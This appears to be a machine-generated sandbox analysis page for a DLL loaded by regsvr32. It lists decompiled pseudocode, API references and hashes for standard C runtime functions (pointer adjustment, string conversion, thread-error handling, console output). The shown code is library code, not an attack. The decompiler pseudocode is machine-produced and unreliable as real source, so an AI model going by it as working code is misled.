0x6e4620f6
0x6e4620fd
0x00000000
0x6e4620fd
0x6e4620f8
0x00000000
0x6e4620f8
0x6e4620ab
0x6e4620b1
0x6e4620b1
0x6e4620b4
0x6e4620b4
0x6e4620b5
0x00000000
0x6e4620b5
0x6e4620ad
0x6e4620af
0x00000000
0x00000000
0x00000000
0x6e4620af
0x6e46206d
0x6e462072
0x6e462074
0x6e462081
0x6e462088
0x6e46208a
0x6e462095
0x6e462095
0x6e462098
0x6e46209a
0x6e46209a
0x6e46209e
0x6e462076
0x6e462076
0x6e462076
0x00000000
0x6e462074
0x6e462025
0x6e46202c
0x6e46202d
0x6e46202f
0x00000000

APIs

_strrchr.LIBCMT ref: 6E462081

Memory Dump Source

Source File: 0000000C.00000002.1160881545.000000006E411000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E410000, based on PE: true

Associated: 0000000C.00000002.1160866965.000000006E410000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.1160998743.000000006E46C000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.1161008297.000000006E474000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.1161014163.000000006E476000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6e410000_regsvr32.jbxd

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: 11b1c95085ed90ed63f646ea018ea21f0b26c21c4d0c52dd0c6a6011423dc464
Instruction ID: b7076502acca25431369d0ac38c4ff8e305b8e01d0ca14fb680e8718fa41fa1f
Opcode Fuzzy Hash: 11b1c95085ed90ed63f646ea018ea21f0b26c21c4d0c52dd0c6a6011423dc464
Instruction Fuzzy Hash: 9DB14771904246AFEB018FB8C890FEEBBF9EF46344F10456BE954AB341DA349942CB64

Uniqueness

Uniqueness Score: -1.00%

Function 6E45C0F4 Relevance: 6.2, APIs: 4, Instructions: 168
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 70%

			E6E45C0F4(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int* _t52;
				signed int _t53;
				intOrPtr _t54;
				signed int _t58;
				signed int _t61;
				intOrPtr _t71;
				signed int _t75;
				signed int _t79;
				signed int _t81;
				signed int _t84;
				signed int _t85;
				signed int _t97;
				signed int* _t98;
				signed char* _t101;
				signed int _t107;
				void* _t111;

				_push(0x10);
				_push(0x6e472520);
				E6E45ADD0(__ebx, __edi, __esi);
				_t75 = 0;
				_t52 =  *(_t111 + 0x10);
				_t81 = _t52[1];
				if(_t81 == 0 ||  *((intOrPtr*)(_t81 + 8)) == 0) {
					L30:
					_t53 = 0;
					__eflags = 0;
					goto L31;
				} else {
					_t97 = _t52[2];
					if(_t97 != 0 ||  *_t52 < 0) {
						_t84 =  *_t52;
						_t107 =  *(_t111 + 0xc);
						if(_t84 >= 0) {
							_t107 = _t107 + 0xc + _t97;
						}
						 *(_t111 - 4) = _t75;
						_t101 =  *(_t111 + 0x14);
						if(_t84 >= 0 || ( *_t101 & 0x00000010) == 0) {
							L10:
							_t54 =  *((intOrPtr*)(_t111 + 8));
							__eflags = _t84 & 0x00000008;
							if((_t84 & 0x00000008) == 0) {
								__eflags =  *_t101 & 0x00000001;
								if(( *_t101 & 0x00000001) == 0) {
									_t84 =  *(_t54 + 0x18);
									__eflags = _t101[0x18] - _t75;
									if(_t101[0x18] != _t75) {
										__eflags = _t84;
										if(_t84 == 0) {
											goto L32;
										} else {
											__eflags = _t107;
											if(_t107 == 0) {
												goto L32;
											} else {
												__eflags =  *_t101 & 0x00000004;
												_t79 = 0;
												_t75 = (_t79 & 0xffffff00 | ( *_t101 & 0x00000004) != 0x00000000) + 1;
												__eflags = _t75;
												 *(_t111 - 0x20) = _t75;
												goto L29;
											}
										}
									} else {
										__eflags = _t84;
										if(_t84 == 0) {
											goto L32;
										} else {
											__eflags = _t107;
											if(_t107 == 0) {
												goto L32;
											} else {
												E6E45BA40(_t107, E6E45B255(_t84,  &(_t101[8])), _t101[0x14]);
												goto L29;
											}
										}
									}
								} else {
									__eflags =  *(_t54 + 0x18);
									if( *(_t54 + 0x18) == 0) {
										goto L32;
									} else {
										__eflags = _t107;
										if(_t107 == 0) {
											goto L32;
										} else {
											E6E45BA40(_t107,  *(_t54 + 0x18), _t101[0x14]);
											__eflags = _t101[0x14] - 4;
											if(_t101[0x14] == 4) {
												__eflags =  *_t107;
												if( *_t107 != 0) {
													_push( &(_t101[8]));
													_push( *_t107);
													goto L21;
												}
											}
											goto L29;
										}
									}
								}
							} else {
								_t84 =  *(_t54 + 0x18);
								goto L12;
							}
						} else {
							_t71 =  *0x6e475358; // 0x0
							 *((intOrPtr*)(_t111 - 0x1c)) = _t71;
							if(_t71 == 0) {
								goto L10;
							} else {
								 *0x6e46c164();
								_t84 =  *((intOrPtr*)(_t111 - 0x1c))();
								L12:
								if(_t84 == 0 || _t107 == 0) {
									L32:
									E6E460332(_t75, _t84, _t97, _t101, _t107);
									asm("int3");
									_push(8);
									_push(0x6e472540);
									E6E45ADD0(_t75, _t101, _t107);
									_t98 =  *(_t111 + 0x10);
									_t85 =  *(_t111 + 0xc);
									__eflags =  *_t98;
									if(__eflags >= 0) {
										_t103 = _t85 + 0xc + _t98[2];
										__eflags = _t85 + 0xc + _t98[2];
									} else {
										_t103 = _t85;
									}
									 *(_t111 - 4) =  *(_t111 - 4) & 0x00000000;
									_t108 =  *(_t111 + 0x14);
									_push( *(_t111 + 0x14));
									_push(_t98);
									_push(_t85);
									_t77 =  *((intOrPtr*)(_t111 + 8));
									_push( *((intOrPtr*)(_t111 + 8)));
									_t58 = E6E45C0F4(_t77, _t103, _t108, __eflags) - 1;
									__eflags = _t58;
									if(_t58 == 0) {
										_t61 = E6E45CE5E(_t103, _t108[0x18], E6E45B255( *((intOrPtr*)(_t77 + 0x18)),  &(_t108[8])));
									} else {
										_t61 = _t58 - 1;
										__eflags = _t61;
										if(_t61 == 0) {
											_t61 = E6E45CE6E(_t103, _t108[0x18], E6E45B255( *((intOrPtr*)(_t77 + 0x18)),  &(_t108[8])), 1);
										}
									}
									 *(_t111 - 4) = 0xfffffffe;
									 *[fs:0x0] =  *((intOrPtr*)(_t111 - 0x10));
									return _t61;
								} else {
									 *_t107 = _t84;
									_push( &(_t101[8]));
									_push(_t84);
									L21:
									 *_t107 = E6E45B255();
									L29:
									 *(_t111 - 4) = 0xfffffffe;
									_t53 = _t75;
									L31:
									 *[fs:0x0] =  *((intOrPtr*)(_t111 - 0x10));
									return _t53;
								}
							}
						}
					} else {
						goto L30;
					}
				}
			}

0x6e45c0f4
0x6e45c0f6
0x6e45c0fb
0x6e45c100
0x6e45c102
0x6e45c105
0x6e45c10a
0x6e45c21a
0x6e45c21a
0x6e45c21a
0x00000000
0x6e45c119
0x6e45c119
0x6e45c11e
0x6e45c128
0x6e45c12a
0x6e45c12f
0x6e45c134
0x6e45c134
0x6e45c136
0x6e45c139
0x6e45c13e
0x6e45c160
0x6e45c160
0x6e45c163
0x6e45c166
0x6e45c184
0x6e45c187
0x6e45c1c6
0x6e45c1c9
0x6e45c1cc
0x6e45c1f1
0x6e45c1f3
0x00000000
0x6e45c1f5
0x6e45c1f5
0x6e45c1f7
0x00000000
0x6e45c1f9
0x6e45c1f9
0x6e45c1fe
0x6e45c202
0x6e45c202
0x6e45c203
0x00000000
0x6e45c203
0x6e45c1f7
0x6e45c1ce
0x6e45c1ce
0x6e45c1d0
0x00000000
0x6e45c1d2
0x6e45c1d2
0x6e45c1d4
0x00000000
0x6e45c1d6
0x6e45c1e7
0x00000000
0x6e45c1ec
0x6e45c1d4
0x6e45c1d0
0x6e45c189
0x6e45c189
0x6e45c18d
0x00000000
0x6e45c193
0x6e45c193
0x6e45c195
0x00000000
0x6e45c19b
0x6e45c1a2
0x6e45c1aa
0x6e45c1ae
0x6e45c1b0
0x6e45c1b3
0x6e45c1b8
0x6e45c1b9
0x00000000
0x6e45c1b9
0x6e45c1b3
0x00000000
0x6e45c1ae
0x6e45c195
0x6e45c18d
0x6e45c168
0x6e45c168
0x00000000
0x6e45c168
0x6e45c145
0x6e45c145
0x6e45c14a
0x6e45c14f
0x00000000
0x6e45c151
0x6e45c153
0x6e45c15c
0x6e45c16b
0x6e45c16d
0x6e45c22c
0x6e45c22c
0x6e45c231
0x6e45c232
0x6e45c234
0x6e45c239
0x6e45c23e
0x6e45c241
0x6e45c244
0x6e45c247
0x6e45c250
0x6e45c250
0x6e45c249
0x6e45c249
0x6e45c249
0x6e45c253
0x6e45c257
0x6e45c25a
0x6e45c25b
0x6e45c25c
0x6e45c25d
0x6e45c260
0x6e45c269
0x6e45c269
0x6e45c26c
0x6e45c2a2
0x6e45c26e
0x6e45c26e
0x6e45c26e
0x6e45c271
0x6e45c288
0x6e45c288
0x6e45c271
0x6e45c2a7
0x6e45c2b1
0x6e45c2bd
0x6e45c17b
0x6e45c17b
0x6e45c180
0x6e45c181
0x6e45c1bb
0x6e45c1c2
0x6e45c206
0x6e45c206
0x6e45c20d
0x6e45c21c
0x6e45c21f
0x6e45c22b
0x6e45c22b
0x6e45c16d
0x6e45c14f
0x00000000
0x00000000
0x00000000
0x6e45c11e

APIs

___AdjustPointer.LIBCMT ref: 6E45C1BB
___AdjustPointer.LIBCMT ref: 6E45C1DE
___AdjustPointer.LIBCMT ref: 6E45C27A

Memory Dump Source

Source File: 0000000C.00000002.1160881545.000000006E411000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E410000, based on PE: true

Associated: 0000000C.00000002.1160866965.000000006E410000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.1160998743.000000006E46C000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.1161008297.000000006E474000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.1161014163.000000006E476000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6e410000_regsvr32.jbxd

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: 9e37c98f0fc5fa76102ce7538075d3ed841d8bc8fd0e667aaf610391fd3b6e48
Instruction ID: d7377eb8bafce04482d41e95747dcd180ea9b7b846f3212b468adfa03a383831
Opcode Fuzzy Hash: 9e37c98f0fc5fa76102ce7538075d3ed841d8bc8fd0e667aaf610391fd3b6e48
Instruction Fuzzy Hash: A551BD72A04606AFEB148FF1D850FAA77A8EF84704F10482FE8155F790E771A8A1CB90

Uniqueness

Uniqueness Score: -1.00%

Function 6E462C78 Relevance: 6.1, APIs: 4, Instructions: 86
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E462C78(intOrPtr* _a4, intOrPtr _a8, intOrPtr _a16) {
				intOrPtr _t16;
				intOrPtr _t17;
				intOrPtr _t19;
				intOrPtr _t29;
				char _t31;
				intOrPtr _t38;
				intOrPtr* _t40;
				intOrPtr _t41;

				_t40 = _a4;
				if(_t40 != 0) {
					_t31 = 0;
					__eflags =  *_t40;
					if( *_t40 != 0) {
						_t16 = E6E463E6E(_a16, 0, _t40, 0xffffffff, 0, 0, 0, 0);
						__eflags = _t16;
						if(__eflags != 0) {
							_t38 = _a8;
							__eflags = _t16 -  *((intOrPtr*)(_t38 + 0xc));
							if(__eflags <= 0) {
								L11:
								_t17 = E6E463E6E(_a16, _t31, _t40, 0xffffffff,  *((intOrPtr*)(_t38 + 8)),  *((intOrPtr*)(_t38 + 0xc)), _t31, _t31);
								__eflags = _t17;
								if(__eflags != 0) {
									 *((intOrPtr*)(_t38 + 0x10)) = _t17 - 1;
									_t19 = 0;
									__eflags = 0;
								} else {
									E6E46027C(GetLastError());
									_t19 =  *((intOrPtr*)(E6E4602B2(__eflags)));
								}
								L14:
								return _t19;
							}
							_t19 = E6E4632B4(_t38, __eflags, _t16);
							__eflags = _t19;
							if(_t19 != 0) {
								goto L14;
							}
							goto L11;
						}
						E6E46027C(GetLastError());
						return  *((intOrPtr*)(E6E4602B2(__eflags)));
					}
					_t41 = _a8;
					__eflags =  *((intOrPtr*)(_t41 + 0xc));
					if(__eflags != 0) {
						L6:
						 *((char*)( *((intOrPtr*)(_t41 + 8)))) = _t31;
						L2:
						 *((intOrPtr*)(_t41 + 0x10)) = _t31;
						return 0;
					}
					_t29 = E6E4632B4(_t41, __eflags, 1);
					__eflags = _t29;
					if(_t29 != 0) {
						return _t29;
					}
					goto L6;
				}
				_t41 = _a8;
				E6E46329A(_t41);
				_t31 = 0;
				 *((intOrPtr*)(_t41 + 8)) = 0;
				 *((intOrPtr*)(_t41 + 0xc)) = 0;
				goto L2;
			}

0x6e462c7f
0x6e462c84
0x6e462ca2
0x6e462ca4
0x6e462ca7
0x6e462cd4
0x6e462cdc
0x6e462cde
0x6e462cf7
0x6e462cfa
0x6e462cfd
0x6e462d0b
0x6e462d1a
0x6e462d22
0x6e462d24
0x6e462d3d
0x6e462d40
0x6e462d40
0x6e462d26
0x6e462d2d
0x6e462d38
0x6e462d38
0x6e462d42
0x00000000
0x6e462d42
0x6e462d02
0x6e462d07
0x6e462d09
0x00000000
0x00000000
0x00000000
0x6e462d09
0x6e462ce7
0x00000000
0x6e462cf2
0x6e462ca9
0x6e462cac
0x6e462caf
0x6e462cc2
0x6e462cc5
0x6e462c98
0x6e462c98
0x00000000
0x6e462c9b
0x6e462cb5
0x6e462cba
0x6e462cbc
0x6e462d46
0x6e462d46
0x00000000
0x6e462cbc
0x6e462c86
0x6e462c8b
0x6e462c90
0x6e462c92
0x6e462c95
0x00000000

APIs

Part of subcall function 6E46329A: _free.LIBCMT ref: 6E4632A8

Part of subcall function 6E463E6E: WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,00000001,6E461736,6E4657F4,0000FDE9,00000000,?,?,?,6E46556D,0000FDE9,00000000,?), ref: 6E463F1A

GetLastError.KERNEL32 ref: 6E462CE0
__dosmaperr.LIBCMT ref: 6E462CE7
GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 6E462D26
__dosmaperr.LIBCMT ref: 6E462D2D

Memory Dump Source

Source File: 0000000C.00000002.1160881545.000000006E411000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E410000, based on PE: true

Associated: 0000000C.00000002.1160866965.000000006E410000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.1160998743.000000006E46C000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.1161008297.000000006E474000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.1161014163.000000006E476000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6e410000_regsvr32.jbxd

Similarity

API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
String ID:
API String ID: 167067550-0
Opcode ID: da0fbfc6eb38f4494911268f83c5d91aeac5c3ff2b0b40bb4e0127ac2760b1dd
Instruction ID: e8799a84e198f65cc71b623830f77f731010ace85c2867680bd5e2faf4c07c1b
Opcode Fuzzy Hash: da0fbfc6eb38f4494911268f83c5d91aeac5c3ff2b0b40bb4e0127ac2760b1dd
Instruction Fuzzy Hash: 31218371604715BF9B505FFA8C84D9BB7ACEF45368710891AF91597650EB30EC4087E4

Uniqueness

Uniqueness Score: -1.00%

Function 6E460E6C Relevance: 6.1, APIs: 4, Instructions: 72
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 79%

			E6E460E6C(void* __ecx, void* __edx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t2;
				long _t3;
				intOrPtr _t5;
				long _t6;
				intOrPtr _t9;
				long _t10;
				signed int _t39;
				signed int _t40;
				void* _t43;
				void* _t49;
				signed int _t51;
				signed int _t53;
				signed int _t54;
				long _t56;
				long _t60;
				long _t61;
				void* _t65;

				_t49 = __edx;
				_t43 = __ecx;
				_t60 = GetLastError();
				_t2 =  *0x6e474110; // 0x6
				_t67 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L6:
					_t3 = E6E461409(__eflags, _t2, 0xffffffff);
					__eflags = _t3;
					if(_t3 == 0) {
						goto L3;
					} else {
						_t51 = E6E4610F8(1, 0x364);
						_pop(_t43);
						__eflags = _t51;
						if(__eflags != 0) {
							__eflags = E6E461409(__eflags,  *0x6e474110, _t51);
							if(__eflags != 0) {
								E6E460C6E(_t51, 0x6e47583c);
								E6E4610BE(0);
								_t65 = _t65 + 0xc;
								goto L13;
							} else {
								_t39 = 0;
								E6E461409(__eflags,  *0x6e474110, 0);
								_push(_t51);
								goto L9;
							}
						} else {
							_t39 = 0;
							__eflags = 0;
							E6E461409(0,  *0x6e474110, 0);
							_push(0);
							L9:
							E6E4610BE();
							_pop(_t43);
							goto L4;
						}
					}
				} else {
					_t51 = E6E4613CA(_t67, _t2);
					if(_t51 == 0) {
						_t2 =  *0x6e474110; // 0x6
						goto L6;
					} else {
						if(_t51 != 0xffffffff) {
							L13:
							_t39 = _t51;
						} else {
							L3:
							_t39 = 0;
							L4:
							_t51 = _t39;
						}
					}
				}
				SetLastError(_t60);
				asm("sbb edi, edi");
				_t53 =  ~_t51 & _t39;
				if(_t53 == 0) {
					E6E460332(_t39, _t43, _t49, _t53, _t60);
					asm("int3");
					_t5 =  *0x6e474110; // 0x6
					_push(_t60);
					__eflags = _t5 - 0xffffffff;
					if(__eflags == 0) {
						L22:
						_t6 = E6E461409(__eflags, _t5, 0xffffffff);
						__eflags = _t6;
						if(_t6 == 0) {
							goto L31;
						} else {
							_t60 = E6E4610F8(1, 0x364);
							_pop(_t43);
							__eflags = _t60;
							if(__eflags != 0) {
								__eflags = E6E461409(__eflags,  *0x6e474110, _t60);
								if(__eflags != 0) {
									E6E460C6E(_t60, 0x6e47583c);
									E6E4610BE(0);
									_t65 = _t65 + 0xc;
									goto L29;
								} else {
									E6E461409(__eflags,  *0x6e474110, _t21);
									_push(_t60);
									goto L25;
								}
							} else {
								E6E461409(__eflags,  *0x6e474110, _t20);
								_push(_t60);
								L25:
								E6E4610BE();
								_pop(_t43);
								goto L31;
							}
						}
					} else {
						_t60 = E6E4613CA(__eflags, _t5);
						__eflags = _t60;
						if(__eflags == 0) {
							_t5 =  *0x6e474110; // 0x6
							goto L22;
						} else {
							__eflags = _t60 - 0xffffffff;
							if(_t60 == 0xffffffff) {
								L31:
								E6E460332(_t39, _t43, _t49, _t53, _t60);
								asm("int3");
								_push(_t39);
								_push(_t60);
								_push(_t53);
								_t61 = GetLastError();
								_t9 =  *0x6e474110; // 0x6
								__eflags = _t9 - 0xffffffff;
								if(__eflags == 0) {
									L38:
									_t10 = E6E461409(__eflags, _t9, 0xffffffff);
									__eflags = _t10;
									if(_t10 == 0) {
										goto L35;
									} else {
										_t54 = E6E4610F8(1, 0x364);
										__eflags = _t54;
										if(__eflags != 0) {
											__eflags = E6E461409(__eflags,  *0x6e474110, _t54);
											if(__eflags != 0) {
												E6E460C6E(_t54, 0x6e47583c);
												E6E4610BE(0);
												goto L45;
											} else {
												_t40 = 0;
												E6E461409(__eflags,  *0x6e474110, 0);
												_push(_t54);
												goto L41;
											}
										} else {
											_t40 = 0;
											__eflags = 0;
											E6E461409(0,  *0x6e474110, 0);
											_push(0);
											L41:
											E6E4610BE();
											goto L36;
										}
									}
								} else {
									_t54 = E6E4613CA(__eflags, _t9);
									__eflags = _t54;
									if(__eflags == 0) {
										_t9 =  *0x6e474110; // 0x6
										goto L38;
									} else {
										__eflags = _t54 - 0xffffffff;
										if(_t54 != 0xffffffff) {
											L45:
											_t40 = _t54;
										} else {
											L35:
											_t40 = 0;
											__eflags = 0;
											L36:
											_t54 = _t40;
										}
									}
								}
								SetLastError(_t61);
								asm("sbb edi, edi");
								_t56 =  ~_t54 & _t40;
								__eflags = _t56;
								return _t56;
							} else {
								L29:
								__eflags = _t60;
								if(_t60 == 0) {
									goto L31;
								} else {
									return _t60;
								}
							}
						}
					}
				} else {
					return _t53;
				}
			}

0x6e460e6c
0x6e460e6c
0x6e460e77
0x6e460e79
0x6e460e7e
0x6e460e81
0x6e460e9f
0x6e460ea2
0x6e460ea7
0x6e460ea9
0x00000000
0x6e460eab
0x6e460eb7
0x6e460eba
0x6e460ebb
0x6e460ebd
0x6e460ee2
0x6e460ee4
0x6e460efd
0x6e460f04
0x6e460f09
0x00000000
0x6e460ee6
0x6e460ee6
0x6e460eef
0x6e460ef4
0x00000000
0x6e460ef4
0x6e460ebf
0x6e460ebf
0x6e460ebf
0x6e460ec8
0x6e460ecd
0x6e460ece
0x6e460ece
0x6e460ed3
0x00000000
0x6e460ed3
0x6e460ebd
0x6e460e83
0x6e460e89
0x6e460e8d
0x6e460e9a
0x00000000
0x6e460e8f
0x6e460e92
0x6e460f0c
0x6e460f0c
0x6e460e94
0x6e460e94
0x6e460e94
0x6e460e96
0x6e460e96
0x6e460e96
0x6e460e92
0x6e460e8d
0x6e460f0f
0x6e460f17
0x6e460f19
0x6e460f1b
0x6e460f23
0x6e460f28
0x6e460f29
0x6e460f2e
0x6e460f2f
0x6e460f32
0x6e460f4c
0x6e460f4f
0x6e460f54
0x6e460f56
0x00000000
0x6e460f58
0x6e460f64
0x6e460f67
0x6e460f68
0x6e460f6a
0x6e460f8d
0x6e460f8f
0x6e460fa6
0x6e460fad
0x6e460fb2
0x00000000
0x6e460f91
0x6e460f98
0x6e460f9d
0x00000000
0x6e460f9d
0x6e460f6c
0x6e460f73
0x6e460f78
0x6e460f79
0x6e460f79
0x6e460f7e
0x00000000
0x6e460f7e
0x6e460f6a
0x6e460f34
0x6e460f3a
0x6e460f3c
0x6e460f3e
0x6e460f47
0x00000000
0x6e460f40
0x6e460f40
0x6e460f43
0x6e460fbd
0x6e460fbd
0x6e460fc2
0x6e460fc5
0x6e460fc6
0x6e460fc7
0x6e460fce
0x6e460fd0
0x6e460fd5
0x6e460fd8
0x6e460ff6
0x6e460ff9
0x6e460ffe
0x6e461000
0x00000000
0x6e461002
0x6e46100e
0x6e461012
0x6e461014
0x6e461039
0x6e46103b
0x6e461054
0x6e46105b
0x00000000
0x6e46103d
0x6e46103d
0x6e461046
0x6e46104b
0x00000000
0x6e46104b
0x6e461016
0x6e461016
0x6e461016
0x6e46101f
0x6e461024
0x6e461025
0x6e461025
0x00000000
0x6e46102a
0x6e461014
0x6e460fda
0x6e460fe0
0x6e460fe2
0x6e460fe4
0x6e460ff1
0x00000000
0x6e460fe6
0x6e460fe6
0x6e460fe9
0x6e461063
0x6e461063
0x6e460feb
0x6e460feb
0x6e460feb
0x6e460feb
0x6e460fed
0x6e460fed
0x6e460fed
0x6e460fe9
0x6e460fe4
0x6e461066
0x6e46106e
0x6e461070
0x6e461070
0x6e461077
0x6e460f45
0x6e460fb5
0x6e460fb5
0x6e460fb7
0x00000000
0x6e460fb9
0x6e460fbc
0x6e460fbc
0x6e460fb7
0x6e460f43
0x6e460f3e
0x6e460f1d
0x6e460f22
0x6e460f22

APIs

GetLastError.KERNEL32(?,?,?,6E45D6E3,?,6E457C85,00000000), ref: 6E460E71
_free.LIBCMT ref: 6E460ECE
_free.LIBCMT ref: 6E460F04
SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,?,6E45D6E3,?,6E457C85,00000000), ref: 6E460F0F

Memory Dump Source

Source File: 0000000C.00000002.1160881545.000000006E411000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E410000, based on PE: true

Associated: 0000000C.00000002.1160866965.000000006E410000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.1160998743.000000006E46C000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.1161008297.000000006E474000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.1161014163.000000006E476000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6e410000_regsvr32.jbxd

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: 860ce5bf83d89d1c41c3346fa40acda570225aa380f90885e2cf262ee1b95eb0
Instruction ID: 2e4dd2973983f26bf3d255ee97f77bc9e9e416f588bb57914ca3a979b5e9e14f
Opcode Fuzzy Hash: 860ce5bf83d89d1c41c3346fa40acda570225aa380f90885e2cf262ee1b95eb0
Instruction Fuzzy Hash: 1A11CA71604651AADF6037FAEC85D6B275DDBC23BAB210A2BF13C963D1FB62880641D0

Uniqueness

Uniqueness Score: -1.00%

Function 6E460FC3 Relevance: 6.1, APIs: 4, Instructions: 69
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 85%

			E6E460FC3(void* __ecx) {
				intOrPtr _t2;
				signed int _t3;
				signed int _t13;
				signed int _t18;
				long _t21;

				_t21 = GetLastError();
				_t2 =  *0x6e474110; // 0x6
				_t24 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L6:
					_t3 = E6E461409(__eflags, _t2, 0xffffffff);
					__eflags = _t3;
					if(_t3 == 0) {
						goto L3;
					} else {
						_t18 = E6E4610F8(1, 0x364);
						__eflags = _t18;
						if(__eflags != 0) {
							__eflags = E6E461409(__eflags,  *0x6e474110, _t18);
							if(__eflags != 0) {
								E6E460C6E(_t18, 0x6e47583c);
								E6E4610BE(0);
								goto L13;
							} else {
								_t13 = 0;
								E6E461409(__eflags,  *0x6e474110, 0);
								_push(_t18);
								goto L9;
							}
						} else {
							_t13 = 0;
							__eflags = 0;
							E6E461409(0,  *0x6e474110, 0);
							_push(0);
							L9:
							E6E4610BE();
							goto L4;
						}
					}
				} else {
					_t18 = E6E4613CA(_t24, _t2);
					if(_t18 == 0) {
						_t2 =  *0x6e474110; // 0x6
						goto L6;
					} else {
						if(_t18 != 0xffffffff) {
							L13:
							_t13 = _t18;
						} else {
							L3:
							_t13 = 0;
							L4:
							_t18 = _t13;
						}
					}
				}
				SetLastError(_t21);
				asm("sbb edi, edi");
				return  ~_t18 & _t13;
			}

0x6e460fce
0x6e460fd0
0x6e460fd5
0x6e460fd8
0x6e460ff6
0x6e460ff9
0x6e460ffe
0x6e461000
0x00000000
0x6e461002
0x6e46100e
0x6e461012
0x6e461014
0x6e461039
0x6e46103b
0x6e461054
0x6e46105b
0x00000000
0x6e46103d
0x6e46103d
0x6e461046
0x6e46104b
0x00000000
0x6e46104b
0x6e461016
0x6e461016
0x6e461016
0x6e46101f
0x6e461024
0x6e461025
0x6e461025
0x00000000
0x6e46102a
0x6e461014
0x6e460fda
0x6e460fe0
0x6e460fe4
0x6e460ff1
0x00000000
0x6e460fe6
0x6e460fe9
0x6e461063
0x6e461063
0x6e460feb
0x6e460feb
0x6e460feb
0x6e460fed
0x6e460fed
0x6e460fed
0x6e460fe9
0x6e460fe4
0x6e461066
0x6e46106e
0x6e461077

APIs

GetLastError.KERNEL32(?,?,?,6E4602B7,6E464772,?,6E46030E,?,00000004,?,?,?,?,6E45F737,?,?), ref: 6E460FC8
_free.LIBCMT ref: 6E461025
_free.LIBCMT ref: 6E46105B
SetLastError.KERNEL32(00000000,00000006,000000FF,?,6E46030E,?,00000004,?,?,?,?,6E45F737,?,?,00000004), ref: 6E461066

Memory Dump Source

Source File: 0000000C.00000002.1160881545.000000006E411000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E410000, based on PE: true

Associated: 0000000C.00000002.1160866965.000000006E410000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.1160998743.000000006E46C000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.1161008297.000000006E474000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.1161014163.000000006E476000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6e410000_regsvr32.jbxd

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: 96dc38bd0fafa8f62d9c7c259b864304c847d646ad192f07c8609ba1bceb3518
Instruction ID: 7e93502fb889805f8a022108ea89e618c3ff3f8c5eb0c8924b1dc7e4dbefa539
Opcode Fuzzy Hash: 96dc38bd0fafa8f62d9c7c259b864304c847d646ad192f07c8609ba1bceb3518
Instruction Fuzzy Hash: 4511C6726045416ADE5037FAAC84D6B275DDBC23B97210A2BF13C977C2EFA2880A41A0

Uniqueness

Uniqueness Score: -1.00%

Function 6E469344 Relevance: 6.0, APIs: 4, Instructions: 29
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E6E469344(void* _a4, long _a8, DWORD* _a12) {
				void* _t13;

				_t13 = WriteConsoleW( *0x6e474870, _a4, _a8, _a12, 0);
				if(_t13 == 0 && GetLastError() == 6) {
					E6E46932D();
					E6E4692EF();
					_t13 = WriteConsoleW( *0x6e474870, _a4, _a8, _a12, _t13);
				}
				return _t13;
			}

0x6e469361
0x6e469365
0x6e469372
0x6e469377
0x6e469392
0x6e469392
0x6e469398

APIs

WriteConsoleW.KERNEL32 ref: 6E46935B
GetLastError.KERNEL32(?,6E4687F3,?,00000001,?,00000001,?,6E465243,?,?,00000001,?,00000001,?,6E46578F,6E461736), ref: 6E469367

Part of subcall function 6E46932D: CloseHandle.KERNEL32(FFFFFFFE), ref: 6E46933D

___initconout.LIBCMT ref: 6E469377

Part of subcall function 6E4692EF: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000), ref: 6E469302

WriteConsoleW.KERNEL32 ref: 6E46938C

Memory Dump Source

Source File: 0000000C.00000002.1160881545.000000006E411000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E410000, based on PE: true

